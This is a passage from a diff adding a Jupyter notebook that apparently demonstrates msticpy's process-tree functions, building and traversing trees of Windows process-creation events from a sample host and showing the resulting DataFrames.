+       "</table>\n",
+       "<p>5 rows × 35 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                                                                TenantId  \\\n",
+       "proc_key                                                                                   \n",
+       "c:\\windows\\system32\\wbem\\wmiprvse.exe|0xda4|201...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "c:\\windows\\system32\\cmd.exe|0x14ec|2019-02-09 2...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "c:\\windows\\system32\\conhost.exe|0x48c|2019-02-0...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "\n",
+       "                                                                       Account  \\\n",
+       "proc_key                                                                         \n",
+       "c:\\windows\\system32\\wbem\\wmiprvse.exe|0xda4|201...  WORKGROUP\\MSTICAlertsWin1$   \n",
+       "c:\\windows\\system32\\cmd.exe|0x14ec|2019-02-09 2...  WORKGROUP\\MSTICAlertsWin1$   \n",
+       "c:\\windows\\system32\\conhost.exe|0x48c|2019-02-0...  WORKGROUP\\MSTICAlertsWin1$   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...  WORKGROUP\\MSTICAlertsWin1$   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...  WORKGROUP\\MSTICAlertsWin1$   \n",
+       "\n",
+       "                                                   EventID  \\\n",
+       "proc_key                                                     \n",
+       "c:\\windows\\system32\\wbem\\wmiprvse.exe|0xda4|201...    4688   \n",
+       "c:\\windows\\system32\\cmd.exe|0x14ec|2019-02-09 2...    4688   \n",
+       "c:\\windows\\system32\\conhost.exe|0x48c|2019-02-0...    4688   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...    4688   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...    4688   \n",
+       "\n",
+       "                                                                      TimeGenerated  \\\n",
+       "proc_key                                                                              \n",
+       "c:\\windows\\system32\\wbem\\wmiprvse.exe|0xda4|201... 2019-02-09 20:04:38.017000+00:00   \n",
+       "c:\\windows\\system32\\cmd.exe|0x14ec|2019-02-09 2... 2019-02-09 20:05:31.010000+00:00   \n",
+       "c:\\windows\\system32\\conhost.exe|0x48c|2019-02-0... 2019-02-09 20:05:31.020000+00:00   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda... 2019-02-09 20:28:02.213000+00:00   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda... 2019-02-09 20:28:56.763000+00:00   \n",
+       "\n",
+       "                                                           Computer  \\\n",
+       "proc_key                                                              \n",
+       "c:\\windows\\system32\\wbem\\wmiprvse.exe|0xda4|201...  MSTICAlertsWin1   \n",
+       "c:\\windows\\system32\\cmd.exe|0x14ec|2019-02-09 2...  MSTICAlertsWin1   \n",
+       "c:\\windows\\system32\\conhost.exe|0x48c|2019-02-0...  MSTICAlertsWin1   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...  MSTICAlertsWin1   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...  MSTICAlertsWin1   \n",
+       "\n",
+       "                                                   SubjectUserSid  \\\n",
+       "proc_key                                                            \n",
+       "c:\\windows\\system32\\wbem\\wmiprvse.exe|0xda4|201...       S-1-5-18   \n",
+       "c:\\windows\\system32\\cmd.exe|0x14ec|2019-02-09 2...       S-1-5-18   \n",
+       "c:\\windows\\system32\\conhost.exe|0x48c|2019-02-0...       S-1-5-18   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...       S-1-5-18   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...       S-1-5-18   \n",
+       "\n",
+       "                                                     SubjectUserName  \\\n",
+       "proc_key                                                               \n",
+       "c:\\windows\\system32\\wbem\\wmiprvse.exe|0xda4|201...  MSTICAlertsWin1$   \n",
+       "c:\\windows\\system32\\cmd.exe|0x14ec|2019-02-09 2...  MSTICAlertsWin1$   \n",
+       "c:\\windows\\system32\\conhost.exe|0x48c|2019-02-0...  MSTICAlertsWin1$   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...  MSTICAlertsWin1$   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...  MSTICAlertsWin1$   \n",
+       "\n",
+       "                                                   SubjectDomainName  \\\n",
+       "proc_key                                                               \n",
+       "c:\\windows\\system32\\wbem\\wmiprvse.exe|0xda4|201...         WORKGROUP   \n",
+       "c:\\windows\\system32\\cmd.exe|0x14ec|2019-02-09 2...         WORKGROUP   \n",
+       "c:\\windows\\system32\\conhost.exe|0x48c|2019-02-0...         WORKGROUP   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...         WORKGROUP   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...         WORKGROUP   \n",
+       "\n",
+       "                                                   SubjectLogonId  \\\n",
+       "proc_key                                                            \n",
+       "c:\\windows\\system32\\wbem\\wmiprvse.exe|0xda4|201...          0x3e7   \n",
+       "c:\\windows\\system32\\cmd.exe|0x14ec|2019-02-09 2...          0x3e7   \n",
+       "c:\\windows\\system32\\conhost.exe|0x48c|2019-02-0...          0x3e7   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...          0x3e7   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...          0x3e7   \n",
+       "\n",
+       "                                                   NewProcessId  ...  \\\n",
+       "proc_key                                                         ...   \n",
+       "c:\\windows\\system32\\wbem\\wmiprvse.exe|0xda4|201...        0xda4  ...   \n",
+       "c:\\windows\\system32\\cmd.exe|0x14ec|2019-02-09 2...       0x14ec  ...   \n",
+       "c:\\windows\\system32\\conhost.exe|0x48c|2019-02-0...        0x48c  ...   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...       0x16fc  ...   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...       0x1c50  ...   \n",
+       "\n",
+       "                                                   source_index_par  \\\n",
+       "proc_key                                                              \n",
+       "c:\\windows\\system32\\wbem\\wmiprvse.exe|0xda4|201...              NaN   \n",
+       "c:\\windows\\system32\\cmd.exe|0x14ec|2019-02-09 2...              NaN   \n",
+       "c:\\windows\\system32\\conhost.exe|0x48c|2019-02-0...            889.0   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...              NaN   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...              NaN   \n",
+       "\n",
+       "                                                   ProcessId_par  \\\n",
+       "proc_key                                                           \n",
+       "c:\\windows\\system32\\wbem\\wmiprvse.exe|0xda4|201...           NaN   \n",
+       "c:\\windows\\system32\\cmd.exe|0x14ec|2019-02-09 2...           NaN   \n",
+       "c:\\windows\\system32\\conhost.exe|0x48c|2019-02-0...         0x798   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...           NaN   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...           NaN   \n",
+       "\n",
+       "                                                             NewProcessName_par  \\\n",
+       "proc_key                                                                          \n",
+       "c:\\windows\\system32\\wbem\\wmiprvse.exe|0xda4|201...                          NaN   \n",
+       "c:\\windows\\system32\\cmd.exe|0x14ec|2019-02-09 2...                          NaN   \n",
+       "c:\\windows\\system32\\conhost.exe|0x48c|2019-02-0...  C:\\Windows\\System32\\cmd.exe   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...                          NaN   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...                          NaN   \n",
+       "\n",
+       "                                                                 timestamp_orig_par  \\\n",
+       "proc_key                                                                              \n",
+       "c:\\windows\\system32\\wbem\\wmiprvse.exe|0xda4|201...        1970-01-01 00:00:00+00:00   \n",
+       "c:\\windows\\system32\\cmd.exe|0x14ec|2019-02-09 2...        1970-01-01 00:00:00+00:00   \n",
+       "c:\\windows\\system32\\conhost.exe|0x48c|2019-02-0... 2019-02-09 20:05:31.010000+00:00   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...        1970-01-01 00:00:00+00:00   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...        1970-01-01 00:00:00+00:00   \n",
+       "\n",
+       "                                                                                           parent_key  \\\n",
+       "proc_key                                                                                                \n",
+       "c:\\windows\\system32\\wbem\\wmiprvse.exe|0xda4|201...  c:\\windows\\system32\\svchost.exe|0x270|1970-01-...   \n",
+       "c:\\windows\\system32\\cmd.exe|0x14ec|2019-02-09 2...  c:\\windowsazure\\guestagent_2.7.41491.901_2019-...   \n",
+       "c:\\windows\\system32\\conhost.exe|0x48c|2019-02-0...  c:\\windows\\system32\\cmd.exe|0x14ec|2019-02-09 ...   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...  c:\\windows\\system32\\svchost.exe|0xb3c|1970-01-...   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...  c:\\windows\\system32\\services.exe|0x220|1970-01...   \n",
+       "\n",
+       "                                                   IsRoot IsLeaf IsBranch  \\\n",
+       "proc_key                                                                    \n",
+       "c:\\windows\\system32\\wbem\\wmiprvse.exe|0xda4|201...  False   True    False   \n",
+       "c:\\windows\\system32\\cmd.exe|0x14ec|2019-02-09 2...  False  False     True   \n",
+       "c:\\windows\\system32\\conhost.exe|0x48c|2019-02-0...  False   True    False   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...  False   True    False   \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...  False   True    False   \n",
+       "\n",
+       "                                                        path parent_index  \n",
+       "proc_key                                                                   \n",
+       "c:\\windows\\system32\\wbem\\wmiprvse.exe|0xda4|201...    1000/0         1000  \n",
+       "c:\\windows\\system32\\cmd.exe|0x14ec|2019-02-09 2...    1001/1         1001  \n",
+       "c:\\windows\\system32\\conhost.exe|0x48c|2019-02-0...  1001/1/2            1  \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...    1002/3         1002  \n",
+       "c:\\program files (x86)\\google\\update\\googleupda...    1003/4         1003  \n",
+       "\n",
+       "[5 rows x 35 columns]"
+      ]
+     },
+     "execution_count": 12,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "p_tree_win.head()"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 13,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-25T15:53:47.138996Z",
+     "start_time": "2020-08-25T15:53:47.047998Z"
+    },
+    "execution_event_id": "9afbc31d-1042-4856-8fa9-3fc9bdc8a92a",
+    "last_executed_text": "import msticpy.sectools.process_tree_utils as ptutil\nimport msticpy.nbtools.process_tree as ptplot\n\np_tree = ptutil.build_process_tree(testdf, show_progress=True)",
+    "persistent_id": "175c1262-ad6d-485c-999b-459cae210ad6"
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>Account</th>\n",
+       "      <th>EventID</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>Computer</th>\n",
+       "      <th>SubjectUserSid</th>\n",
+       "      <th>SubjectUserName</th>\n",
+       "      <th>SubjectDomainName</th>\n",
+       "      <th>SubjectLogonId</th>\n",
+       "      <th>NewProcessId</th>\n",
+       "      <th>...</th>\n",
+       "      <th>source_index_par</th>\n",
+       "      <th>ProcessId_par</th>\n",
+       "      <th>NewProcessName_par</th>\n",
+       "      <th>timestamp_orig_par</th>\n",
+       "      <th>parent_key</th>\n",
+       "      <th>IsRoot</th>\n",
+       "      <th>IsLeaf</th>\n",
+       "      <th>IsBranch</th>\n",
+       "      <th>path</th>\n",
+       "      <th>parent_index</th>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>proc_key</th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x1994</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaT</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>True</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>1007</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\collectguestlogs.exe|0x123c|2019-02-09 23:16:28.153000</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-09 23:16:28.153000+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x123c</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>c:\\windowsazure\\guestagent_2.7.41491.901_2019-...</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>1007/103</td>\n",
+       "      <td>1007</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>c:\\windows\\system32\\conhost.exe|0x20b0|2019-02-09 23:16:28.163000</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-09 23:16:28.163000+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x20b0</td>\n",
+       "      <td>...</td>\n",
+       "      <td>986.0</td>\n",
+       "      <td>0x1994</td>\n",
+       "      <td>C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...</td>\n",
+       "      <td>2019-02-09 23:16:28.153000+00:00</td>\n",
+       "      <td>c:\\windowsazure\\guestagent_2.7.41491.901_2019-...</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>False</td>\n",
+       "      <td>1007/103/104</td>\n",
+       "      <td>103</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23:20:15.547000</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-09 23:20:15.547000+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0xccc</td>\n",
+       "      <td>...</td>\n",
+       "      <td>986.0</td>\n",
+       "      <td>0x1994</td>\n",
+       "      <td>C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...</td>\n",
+       "      <td>2019-02-09 23:16:28.153000+00:00</td>\n",
+       "      <td>c:\\windowsazure\\guestagent_2.7.41491.901_2019-...</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>1007/103/105</td>\n",
+       "      <td>103</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-09 23:20:15.560000</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-09 23:20:15.560000+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x14ec</td>\n",
+       "      <td>...</td>\n",
+       "      <td>988.0</td>\n",
+       "      <td>0x123c</td>\n",
+       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
+       "      <td>2019-02-09 23:20:15.547000+00:00</td>\n",
+       "      <td>c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 2...</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>False</td>\n",
+       "      <td>1007/103/105/106</td>\n",
+       "      <td>105</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>5 rows × 35 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                                                                TenantId  \\\n",
+       "proc_key                                                                                   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...                                   NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "c:\\windows\\system32\\conhost.exe|0x20b0|2019-02-...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "\n",
+       "                                                                       Account  \\\n",
+       "proc_key                                                                         \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...                         NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  WORKGROUP\\MSTICAlertsWin1$   \n",
+       "c:\\windows\\system32\\conhost.exe|0x20b0|2019-02-...  WORKGROUP\\MSTICAlertsWin1$   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...  WORKGROUP\\MSTICAlertsWin1$   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...  WORKGROUP\\MSTICAlertsWin1$   \n",
+       "\n",
+       "                                                   EventID  \\\n",
+       "proc_key                                                     \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...    4688   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...    4688   \n",
+       "c:\\windows\\system32\\conhost.exe|0x20b0|2019-02-...    4688   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...    4688   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...    4688   \n",
+       "\n",
+       "                                                                      TimeGenerated  \\\n",
+       "proc_key                                                                              \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...        1970-01-01 00:00:00+00:00   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 2019-02-09 23:16:28.153000+00:00   \n",
+       "c:\\windows\\system32\\conhost.exe|0x20b0|2019-02-... 2019-02-09 23:16:28.163000+00:00   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23... 2019-02-09 23:20:15.547000+00:00   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-... 2019-02-09 23:20:15.560000+00:00   \n",
+       "\n",
+       "                                                           Computer  \\\n",
+       "proc_key                                                              \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  MSTICAlertsWin1   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  MSTICAlertsWin1   \n",
+       "c:\\windows\\system32\\conhost.exe|0x20b0|2019-02-...  MSTICAlertsWin1   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...  MSTICAlertsWin1   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...  MSTICAlertsWin1   \n",
+       "\n",
+       "                                                   SubjectUserSid  \\\n",
+       "proc_key                                                            \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...            NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...       S-1-5-18   \n",
+       "c:\\windows\\system32\\conhost.exe|0x20b0|2019-02-...       S-1-5-18   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...       S-1-5-18   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...       S-1-5-18   \n",
+       "\n",
+       "                                                     SubjectUserName  \\\n",
+       "proc_key                                                               \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...               NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  MSTICAlertsWin1$   \n",
+       "c:\\windows\\system32\\conhost.exe|0x20b0|2019-02-...  MSTICAlertsWin1$   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...  MSTICAlertsWin1$   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...  MSTICAlertsWin1$   \n",
+       "\n",
+       "                                                   SubjectDomainName  \\\n",
+       "proc_key                                                               \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...               NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...         WORKGROUP   \n",
+       "c:\\windows\\system32\\conhost.exe|0x20b0|2019-02-...         WORKGROUP   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...         WORKGROUP   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...         WORKGROUP   \n",
+       "\n",
+       "                                                   SubjectLogonId  \\\n",
+       "proc_key                                                            \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...          0x3e7   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...          0x3e7   \n",
+       "c:\\windows\\system32\\conhost.exe|0x20b0|2019-02-...          0x3e7   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...          0x3e7   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...          0x3e7   \n",
+       "\n",
+       "                                                   NewProcessId  ...  \\\n",
+       "proc_key                                                         ...   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...       0x1994  ...   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...       0x123c  ...   \n",
+       "c:\\windows\\system32\\conhost.exe|0x20b0|2019-02-...       0x20b0  ...   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...        0xccc  ...   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...       0x14ec  ...   \n",
+       "\n",
+       "                                                   source_index_par  \\\n",
+       "proc_key                                                              \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...              NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...              NaN   \n",
+       "c:\\windows\\system32\\conhost.exe|0x20b0|2019-02-...            986.0   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...            986.0   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...            988.0   \n",
+       "\n",
+       "                                                   ProcessId_par  \\\n",
+       "proc_key                                                           \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...           NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...           NaN   \n",
+       "c:\\windows\\system32\\conhost.exe|0x20b0|2019-02-...        0x1994   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...        0x1994   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...        0x123c   \n",
+       "\n",
+       "                                                                                   NewProcessName_par  \\\n",
+       "proc_key                                                                                                \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...                                                NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...                                                NaN   \n",
+       "c:\\windows\\system32\\conhost.exe|0x20b0|2019-02-...  C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...  C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...                        C:\\Windows\\System32\\cmd.exe   \n",
+       "\n",
+       "                                                                  timestamp_orig_par  \\\n",
+       "proc_key                                                                               \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...                               NaT   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...         1970-01-01 00:00:00+00:00   \n",
+       "c:\\windows\\system32\\conhost.exe|0x20b0|2019-02-...  2019-02-09 23:16:28.153000+00:00   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...  2019-02-09 23:16:28.153000+00:00   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...  2019-02-09 23:20:15.547000+00:00   \n",
+       "\n",
+       "                                                                                           parent_key  \\\n",
+       "proc_key                                                                                                \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...                                                NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  c:\\windowsazure\\guestagent_2.7.41491.901_2019-...   \n",
+       "c:\\windows\\system32\\conhost.exe|0x20b0|2019-02-...  c:\\windowsazure\\guestagent_2.7.41491.901_2019-...   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...  c:\\windowsazure\\guestagent_2.7.41491.901_2019-...   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...  c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 2...   \n",
+       "\n",
+       "                                                   IsRoot IsLeaf IsBranch  \\\n",
+       "proc_key                                                                    \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...   True  False    False   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  False  False     True   \n",
+       "c:\\windows\\system32\\conhost.exe|0x20b0|2019-02-...  False   True    False   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...  False  False     True   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...  False   True    False   \n",
+       "\n",
+       "                                                                path  \\\n",
+       "proc_key                                                               \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...              1007   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...          1007/103   \n",
+       "c:\\windows\\system32\\conhost.exe|0x20b0|2019-02-...      1007/103/104   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...      1007/103/105   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...  1007/103/105/106   \n",
+       "\n",
+       "                                                   parent_index  \n",
+       "proc_key                                                         \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...          NaN  \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...         1007  \n",
+       "c:\\windows\\system32\\conhost.exe|0x20b0|2019-02-...          103  \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...          103  \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...          105  \n",
+       "\n",
+       "[5 rows x 35 columns]"
+      ]
+     },
+     "execution_count": 13,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Take one of those roots and get the full tree beneath it\n",
+    "t_root = ptree.get_roots(p_tree_win).loc[\n",
+    "    \"c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\"\n",
+    "]\n",
+    "full_tree = ptree.get_descendents(p_tree_win, t_root)\n",
+    "full_tree.head()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### get_children\n",
+    "Get the immediate children of a process"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 14,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-25T15:53:47.202996Z",
